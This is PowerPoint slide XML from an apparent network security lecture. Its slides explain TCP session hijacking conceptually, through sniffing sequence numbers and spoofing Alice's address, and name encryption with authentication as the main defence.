              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network Ingress Filtering: Defeating DDoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12725400" y="9461500"/>
            <a:ext cx="266700" cy="279400"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A4EEF851-3DC9-41A9-ADB2-FB39AF52758B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A4B6F174-D900-478A-A1B3-0E41ED3AA6DC}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="787400" y="914400"/>
            <a:ext cx="11053763" cy="9144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Session hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10248" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="711200" y="2438400"/>
            <a:ext cx="11334750" cy="1812925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Take control of one side of a TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:schemeClr val="accent6"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Marriage of sniffing and spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16389" name="Group 4"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2970213" y="4572000"/>
            <a:ext cx="6556375" cy="4648200"/>
            <a:chOff x="1296" y="1787"/>
            <a:chExt cx="2904" cy="2059"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="16390" name="Object 5"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="3711" y="2236"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s16452" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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 y="2236"/>
                          <a:ext cx="385" cy="328"/>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6391" name="Object 6"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="2570" y="3266"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s16453" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682"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0" y="3266"/>
                          <a:ext cx="385" cy="328"/>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6392" name="Object 7"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1311" y="2186"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s16454" name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId6" imgW="1307079" imgH="1083682" progId="">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1" y="2186"/>
                          <a:ext cx="385" cy="328"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="16393" name="Freeform 8"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2111" y="1787"/>
              <a:ext cx="1289" cy="1291"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 218 w 1292"/>
                <a:gd name="T1" fmla="*/ 7 h 1255"/>
                <a:gd name="T2" fmla="*/ 35 w 1292"/>
                <a:gd name="T3" fmla="*/ 287 h 1255"/>
                <a:gd name="T4" fmla="*/ 29 w 1292"/>
                <a:gd name="T5" fmla="*/ 946 h 1255"/>
                <a:gd name="T6" fmla="*/ 53 w 1292"/>
                <a:gd name="T7" fmla="*/ 1499 h 1255"/>
                <a:gd name="T8" fmla="*/ 224 w 1292"/>
                <a:gd name="T9" fmla="*/ 1576 h 1255"/>
                <a:gd name="T10" fmla="*/ 625 w 1292"/>
                <a:gd name="T11" fmla="*/ 2041 h 1255"/>
                <a:gd name="T12" fmla="*/ 953 w 1292"/>
                <a:gd name="T13" fmla="*/ 2239 h 1255"/>
                <a:gd name="T14" fmla="*/ 1136 w 1292"/>
                <a:gd name="T15" fmla="*/ 1851 h 1255"/>
                <a:gd name="T16" fmla="*/ 1208 w 1292"/>
                <a:gd name="T17" fmla="*/ 806 h 1255"/>
                <a:gd name="T18" fmla="*/ 1142 w 1292"/>
                <a:gd name="T19" fmla="*/ 381 h 1255"/>
                <a:gd name="T20" fmla="*/ 707 w 1292"/>
                <a:gd name="T21" fmla="*/ 207 h 1255"/>
                <a:gd name="T22" fmla="*/ 218 w 1292"/>
                <a:gd name="T23" fmla="*/ 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sp>
          <p:nvSpPr>
            <p:cNvPr id="16394" name="Line 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1681" y="2335"/>
              <a:ext cx="475" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16395" name="Line 10"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2763" y="2958"/>
              <a:ext cx="0" cy="327"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16396" name="Line 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3363" y="2374"/>
              <a:ext cx="397" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16397" name="Line 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1704" y="2264"/>
              <a:ext cx="2024" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16398" name="Line 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2888" y="2538"/>
              <a:ext cx="825" cy="684"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16399" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1926" y="2051"/>
              <a:ext cx="727" cy="198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Alice telnet</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16400" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-2289434">
              <a:off x="2967" y="2899"/>
              <a:ext cx="829" cy="198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>“</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>hi, I</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>’</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ja-JP" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>m Alice</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ja-JP" altLang="en-US" sz="2300">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>”</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="2300">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16401" name="Text Box 16"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1296" y="2628"/>
              <a:ext cx="371" cy="198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Alice</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16402" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3886" y="2534"/>
              <a:ext cx="314" cy="198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Bob</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16403" name="Text Box 18"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2549" y="3648"/>
              <a:ext cx="570" cy="198"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2300">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attacker</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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="325437"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8B5719C8-BB1C-4EE8-8708-F023822B90B9}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17411" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="787400" y="838200"/>
            <a:ext cx="11053763" cy="12192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Session hijacking: The details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17412" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="2046288"/>
            <a:ext cx="11053763" cy="6610350"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker is on segment where traffic passes from Alice to Bob</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker sniffs packets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sees TCP packets between Bob and Alice and their sequence numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker jumps in, sending TCP packets to Bob; source IP address = Alice’s IP address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bob now obeys commands sent by attacker, thinking they were sent by Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Principal defense: encryption w/ auth protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker does not have keys to encrypt and insert meaningful traffic</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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428164"/>
            <a:ext cx="650875" cy="296862"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2C325687-F48F-450B-902E-8AB3CC8FAF4E}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18435" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="762000"/>
            <a:ext cx="11053763" cy="16256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Session hijacking: limitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18436" name="Object 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8470900" y="3179763"/>
          <a:ext cx="869950" cy="741362"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s18498" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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0900" y="3179763"/>
                        <a:ext cx="869950" cy="741362"/>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8437" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5894388" y="5505450"/>
          <a:ext cx="869950" cy="741363"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
